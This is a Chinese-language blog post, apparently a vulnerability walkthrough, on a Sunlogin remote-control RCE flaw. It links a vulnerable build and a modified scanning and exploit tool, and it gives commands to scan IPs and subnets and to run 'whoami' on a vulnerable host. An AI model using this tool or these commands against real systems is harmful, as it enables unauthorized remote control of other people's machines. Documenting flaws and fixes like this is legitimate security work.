0x01 漏洞简介

向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

上海贝锐信息科技股份有限公司向日葵的简约版和个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

漏洞分析:https://download.nstns.com/xs/text/pdf/SunloginClient_Rec.pdf

影响范围:

  • 向日葵个人版 for Windows <= V11.0.0.33
  • 向日葵简约版 <= V1.0.1.43315(2021.12)

0x02 漏洞环境

演示环境为存在漏洞向日葵版本v11.0.0.33162 ,漏洞检测利用工具是来自TRY大佬写的工具,博主在其基础上修改了下部分源码,新增支持了网段检测漏洞功能。

  • 向日葵漏洞版本:11.0.0.33162 点击下载 提取码 qm7u
  • 向日葵RCE工具修改版:点击下载 提取码: vnp5

向日葵RCE工具修改版已经编译好一份exe文件了,源码也给出了,懂Go语言的想自定义代码或者想要在的其他系统上运行的可以自行编译。

0x03 漏洞利用

漏洞检测利用工具修改版使用命令如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

╔═╗┬ ┬┌┐┌╦  ┌─┐┌─┐┬┌┐┌   ╦═╗┌─┐┌─┐
╚═╗│ ││││║  │ ││ ┬││││───╠╦╝│  ├┤
╚═╝└─┘┘└┘╩═╝└─┘└─┘┴┘└┘   ╩╚═└─┘└─┘


                                                by:T00ls.net
                                                向日葵Rce 修改版
                                                支持IP、网段检测

----------------------------------------------

Usage of xrkRcePro.exe:
  -c string
        指定命令
  -h string
        支持IP(x.x.x.x)  网段(x.x.x.0/24)
  -p string
        指定端口 (default "1-65535")
  -t string
        指定类型:scan rce (default "scan")
  -x int
        检测速度 (default 2000)

检测某目标是否存在漏洞:

1
xrkRcePro -h 10.211.55.3 -t scan

检测某网段是否存在漏洞:

1
xrkRcePro -h 10.211.55.0/24 -t scan

默认扫描全端口:1-65535,可以根据实际场景指定端口范围

1
xrkRcePro -h 10.211.55.3 -t scan -p 50000-60000

默认检测速度是2000,可以根据实际场景选择检测速度:

1
xrkRcePro -h 10.211.55.0/24 -t scan -x 8000

检测到目标及端口号存在漏洞,利用RCE工具远程执行命令

1
xrkRcePro -h 10.211.55.3 -t rce -p 50164 -c "whoami"

0x04 漏洞修复

厂商已发布了漏洞修复程序,请及时关注更新:https://sunlogin.oray.com/

参考文章